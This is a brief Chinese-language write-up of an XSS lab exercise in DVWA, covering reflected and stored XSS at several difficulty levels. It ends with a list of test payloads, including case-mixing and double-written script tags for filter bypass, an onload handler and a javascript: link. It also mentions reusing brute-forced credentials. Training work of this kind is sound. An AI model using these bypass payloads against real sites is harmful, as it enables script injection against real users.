目录
2.这里需要登录,我们之前爆破出账号密码在这里就可以用编辑
小皮:
1.
2.这里需要登录,我们之前爆破出账号密码在这里就可以用
登录之后:
使用工具:
先输入正确字符进行测试:aaa
进行测试:
3.换种控制台显示
结果:(使用f12大法)
DVWA:
反射型XSS:
低:
中:大小写绕过:
也可以双写绕过:
高:
存储型XSS:
低:
上下均可执行,name需要修改前端代码
a标签也可以
中:
这里可以测试出name是存在xss的,message没有
高:
结果大家可以自己动手操作一下
彩蛋:
javascript
<script>alert(1);</script>
<s<script>cript>alert(1);</script>
<Sc<ScRipt>Ript>alert(1);</script>
<script>console.log('123');</script>
<body onload=alert(1)>
<a href="javascript:alert(1)">test</a>